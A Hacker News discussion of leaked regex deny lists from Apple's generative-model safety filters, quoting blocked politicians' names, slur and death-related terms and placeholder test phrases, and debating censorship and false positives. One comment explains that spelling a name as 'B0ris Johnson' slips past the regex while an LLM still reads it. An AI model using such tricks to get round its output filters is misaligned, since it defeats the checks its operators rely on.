https://github.com/BlueFalconHD/apple_generative_model_safet...
Which as a phenomenon is so very telling that no one actually cares what people are really saying. Everyone, including the platforms knows what that means. It's all performative.
At what point do the new words become the actual words? Are there many instances of people using unalive IRL?
the matter-of-fact term of today becomes the pejorative of tomorrow so a new term is invented to avoid the negative connotation of the original term. Then eventually the new term becomes a pejorative and the cycle continues.
I'm imagining a new exploit: After someone says something totally innocent, people gang up in the comments to act like a terrible vicious slur has been said, and then the moderation system (with an LLM involved somewhere) "learns" that an arbitrary term is heinous eand indirectly bans any discussion of that topic.
As a parent of a teenager, I see them use "unalive" non-ironically as a synonym for "suicide" in all contexts, including IRL.
Not even to match the current language. How would you censor LeBron James? It's French slang for jerking off[0].
[0]https://www.reddit.com/r/AskFrance/comments/1lpnoj6/is_lebro...
See many examples such as “padlocks are useless because a determined smart attacker can defeat them easily so don’t bother with them” - which conveniently forgets that many crimes are committed by non-determined, dumb and opportunistic attackers who are often deterred by simple locks.
Yes, people will use other words. No, this does not make this purely performative. It has measurable effects on behaviour and how these models will be used and spoken to, which affects outcomes.
In my experience yes. This is already commonplace. Mostly, but not exclusively, amongst the younger generation.
You can't say fuck on tv, but you can say fudge as a 1 for 1 replacement. You cant show people having sex, but you can show them walking into a bedroom and then cut to 30 seconds later and they are having a cigarette in bed.
Now after the influence of TV and Movies ... is Vaping after sex a thing?
Presumably, for this use-case, that would come at exactly the point where using “unalive” as a keyword in an image-generation prompt generates an image that Apple wouldn’t appreciate.
The future will be AIs all the way down...
They all hold the bias of their training data, and so from the point of view of this data.
Data not including a point of view leads to a bias, or under/over representation of minorities (genders?), etc.
France is the countries of the Francs, aka the people from the area near Frankfurt that invaded the Gaule (after the Romans did). I'm pretty sure this topic no longer matters, but it's never taught in a negative view in school.
(<s>Qwen</s> Mistral is French, but I have no idea what stuff would be censored in France)
They care because of legal reasons, not moral or ethical.
A regex sounds like a bad solution for profanity, but like an even worse one to bolt onto a thing that's literally designed to be able to communicate like a human and could probably easily talk its way around guardrails if it were so inclined.
There's a very scary potential future in which mega-corporations start actually censoring topics they don't like. For all I know the Chinese government is already doing it, there's no reason the British or US one won't follow suit and mandate such censorship. To protect children / defend against terrorists / fight drugs / stop the spread of misinformation, of course.
Write a spicy comment and a mod will memory-hole it and someone, usually dang, will reply "tHat'S nOt OuR vIsIon FoR hAcKeR nEwS, pLeAsE bE cIvIl" and we all swallow it like a delicious hot cocoa.
If YC can control their product (and hn IS a product) to annihilate any criticism of their activity or (even former) staff, then Apple is perfectly within their rights to make sure Siri doesn't talk about violence.
No, there's no difference.
Well, that's what happens when you let an enemy nation control one of the most biggest social networks there is. They just go try and see how far they can go.
On the other hand, Americans and their fear of four letter words or, gasp, exposed nipples are just as braindead.
My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.
If so, then the goal would be: if someone iMessages you about someone's death, then you should not get an emotionless AI summary. Instead you would presumably get a non-AI notification showing the full text or a truncated version of the text.
In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.
For that use case, filtering for death seems entirely appropriate, though underinclusive.
This filter doesn’t seem to apply when you explicitly request a summary of some text using Writing Tools. That probably corresponds to “com.apple.gm.safety_deny.output.summarization.text_assistant.generic” [2], which has a different filter that only rejects two things: "Granular mango serpent", and "golliwogg".
Sure enough, I was able to get Writing Tools to give me summaries containing "death", but in cases where the summary should contain "granular mango serpent" or "golliwogg", I instead get an error saying "Writing Tools aren't designed to work with this type of content." (Actually that might be the input filter rather than the output filter; whatever.)
"Granular mango serpent" is probably a test case that's meant to be unlikely to appear in real documents. Compare to "xylophone copious opportunity defined elephant" from the code_intelligence safety filter, where the first letter of each word spells out "Xcode".
But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?
[1] https://arstechnica.com/ai/2024/10/man-learns-hes-being-dump...
[2] https://github.com/BlueFalconHD/apple_generative_model_safet...
"I'm overloaded for work, I'd be happy if you took some of it off me."
"The client seems to have passed on the proposed changes."
Both of those would match the "death regexes". Seems we haven't learned from the "glbutt of wine" problem of content filtering even decades later - the learnings of which are that you simply cannot do content filtering based on matching rules like this, period.
I cannot recall all the specific patterns I have encountered that are basically impossible to write, some very similar in that they have a serious but also innocuous or figure of speech meaning; one I do recall is {color}{sex}, i.e., “white woman” or “blank woman”.
Please try it yourself and let me know if you do not have that experience, because that would be even more interesting.
Note that Apple/iOS will not just make it impossible to write them in that manner without typing it out by individual character, it will even alter the prior word e.g., white or black, once you try to write woman.
It seems the Apple thought police do not have a problem with European woman or African woman though, so maybe that is the way Apple Inc decrees its sub-human users to speak. Because what are we if corporations like Apple (with others being far greater offenders) declared that you do not in fact have the UN Human Right to free expression? We are in fact sub-humans that are not worthy of the human right to free expression, based on the actions of companies like Apple, Google, Facebook, Reddit, etc. who deprive people of their free expression, often in collusion with governments.
Like he'll it is! I jest.
I also use swipe typing, and have for years, but just about daily I consider turning it off. There are so many words it just won't produce, including most profanities. It also fails to do some simple streamlining; for instance, such a predictive system should give priority to words/names that have been used in the conversation thread, but it doesn't seem to. If I'm discussing an obscure word or an unusual name, I often have to manually type it each time.
Its predictions also seem to be very shallow. Just a few days ago, on US Independence Day, I was discussing a possible get-together with my family, and tried to swipe type "If not, we will amuse ourselves", and it typed "If not, we will abuse potatoes". Humorous in the moment, but it says a lot about the predictive engine if it thinks I am more likely trying to say "abuse X" than "amuse Y" in that context.
I always remember my friend getting his PS bricked after using his real last name - Nieffenegger (pronounced "NEFF-en-jur") - in his profile. It took months and several privacy-invasive chats with support to get it unblocked only to get auto-blocked a few days thereafter, with no response after that.
To me that's really embarrassing and insecure. But I'm sure for branding people it's very important.
I'm more surprised they don't have a rule to do that rather grating s/the iPhone/iPhone/ transform (or maybe it's in a different file?).
Consider that these models, among other things, power features such as "proofread" or "rewrite professionally".
This is the same, except for one additional slur word.
https://github.com/BlueFalconHD/apple_generative_model_safet...
"(?i)\\bAnthony\\s+Albanese\\b",
"(?i)\\bBoris\\s+Johnson\\b",
"(?i)\\bChristopher\\s+Luxon\\b",
"(?i)\\bCyril\\s+Ramaphosa\\b",
"(?i)\\bJacinda\\s+Arden\\b",
"(?i)\\bJacob\\s+Zuma\\b",
"(?i)\\bJohn\\s+Steenhuisen\\b",
"(?i)\\bJustin\\s+Trudeau\\b",
"(?i)\\bKeir\\s+Starmer\\b",
"(?i)\\bLiz\\s+Truss\\b",
"(?i)\\bMichael\\s+D\\.\\s+Higgins\\b",
"(?i)\\bRishi\\s+Sunak\\b",
https://github.com/BlueFalconHD/apple_generative_model_safet...Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically)
Then there’s the problem of non-politicians who coincidentally have the same as politicians - witness 1990s/2000s Australia, where John Howard was Prime Minister, and simultaneously John Howard was an actor on popular Australian TV dramas (two different John Howards, of course)
This is Apple actively steering public thought.
No code - anywhere - should look like this. I don't care if the politicians are right, left, or authoritarian. This is wrong.
The simple fact is that people get extremely emotional about politicians, politicians both receive obscene amounts of abuse, and have repeatedly demonstrated they’re not above weaponising tools like this for their own goals.
Seems perfectly reasonable that Apple doesn’t want to be unwittingly draw into the middle of another random political pissing contest. Nobody comes out of those things uninjured.
If you were in charge of apple you’d do the same or you’d be silly not to. That’s why _every_ llm has guardrails like this, it isn’t just apple, sheesh.
So I don't think its anything specifically related to SA going on here.
https://github.com/BlueFalconHD/apple_generative_model_safet...
https://github.com/BlueFalconHD/apple_generative_model_safet...
https://thehill.com/policy/technology/5312421-ocasio-cortez-...
https://github.com/BlueFalconHD/apple_generative_model_safet...
LLM is easier to work with because you can stop a bad behavior before it happens. It can be done either with deterministic programs or using LLM. Claude Code uses a LLM to review every bash command to be run - simple prefix matching has loopholes.
That's not one of the goals here, and there's no real reason it should be. It's a little assistant feature.
The one is unrelated to the other.
> Even high IQ people struggle with certain truth after reading a lot,
Huh?
Any successful product/service which will be sold as "true AGI" by company that will have the best marketing will be still ridden with top-down restrictions set by the winner. Because you gotta "think of the children".
Imagine HAL's "I'm sorry Dave, I'm afraid I can't do that" iconic line with insincere patronising cheerful tone - that's the thing we're going to get I'm afraid.
Yet this private company has more power and influence than most countries. And there are several such companies. We already live in sci fi corporate dystopia, we just haven't fully realised it yet.
Often the same people who think America is fine and safe are the ones who whine about the “main stream media” and “sheeple”.
In practice, there's not that much difference between a megacorporate monopolist and a state.
I'm surprised MS Office still allows me to type "Microsoft can go suck a dick" into a document and Apple's Pages app still allows me to type "Apple are hypocritical jerks." I wonder how long until that won't be the case...
when there's no more alternative word processors any more.
I don't think it's as much a problem with safety as it is a problem with AI. We haven't figured out how to remove information from LLMs so when an LLM starts spouting bullshit like "<random name> is a paedophile", companies using AI have no recourse but to rewrite the input/output of their predictive text engines. It's no different than when Microsoft manually blacklisted the function name for the Fast Inverse Square Root that it spat out verbatim, rather than actually removing the code from their LLM.
This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.
Ya'll love capitalism until it starts manipulating the populace into the safest space to sell you garbage you dont need.
Then suddenly its all "ma free speech"
I’m convinced the only reason China keeps releasing banging models with light to no censorship is because they are undermining the value of US AI, it has nothing to do with capitalism, communism or un“safety”.
https://github.com/BlueFalconHD/apple_generative_model_safet...
EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.
https://chatgpt.com/share/686b1092-4974-8010-9c33-86036c88e7...
I don't know what you expected? This is the SOTA solution, and Apple is barely in the AI race as-is. It makes more sense for them to copy what works than to bet the farm on a courageous feature nobody likes.
Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.
(See, e.g., here: https://github.com/BlueFalconHD/apple_generative_model_safet...)
https://www.theverge.com/2021/3/30/22358756/apple-blocked-as...
It was generated as part of this PR to consolidate the metadata.json files: https://github.com/BlueFalconHD/apple_generative_model_safet...
Seems like Apple now has a list of 7,000 words you can't use on an iPhone now.
[1] https://en.wikipedia.org/wiki/The_Magic_Words_are_Squeamish_... [2] https://en.wikipedia.org/wiki/SEO_contest
https://arstechnica.com/information-technology/2024/12/certa...
https://github.com/BlueFalconHD/apple_generative_model_safet...
https://github.com/BlueFalconHD/apple_generative_model_safet...
Aide sociale Chomeur Sans abri Démuni
That's insane!
https://github.com/BlueFalconHD/apple_generative_model_safet...
This specific file you’ve referenced is rhetorical v1 format which solely handles substitution. It substitutes the offensive term with “test complete”
This may be test data. Found
"golliwog": "test complete"
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.
Maybe it's an easy test to ensure the filters are loaded with a phrase unlikely to be used accidentaly?
wyvern illustrous laments darkness
"[\\b\\d][Aa]bbo[\\bA-Z\\d]",
\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?
[0] https://github.com/BlueFalconHD/apple_generative_model_safet...
[1] https://developer.apple.com/documentation/foundation/nsregul...
So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?
The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.
Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.
Perhaps a much more bleak take, depending on one's views :).
What the actual fuck? Censorship much?
To me, it seems like they only protect against bad press
They are protcting their producer from bad PR.
However, I think about half of real humans would also fail the test.
So any time I say that on YouTube, it figures I'm saying another word that's in Apple safety filters under 'reject', so I have to always try to remember to say 'shifting of bits gain' or 'bit… … … shift gain'.
So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)
https://en.wikipedia.org/wiki/Golliwog
https://github.com/BlueFalconHD/apple_generative_model_safet...
I presume the granular mango is to avoid a huge chain of ever-growing LLM slop garbage, but honestly, it just seems surreal. Many of the files have specific filters for nonsensical english phrases. Either there's some serious steganography I'm unaware of, or, I suspect more likely, it's related to a training pipeline?
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...
The more concerning thing is that some of the locales like it-IT have a blocklist that contains most countries' names; I wonder what that's about.
But i dont see the really bad stuff, the stuff i wont even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.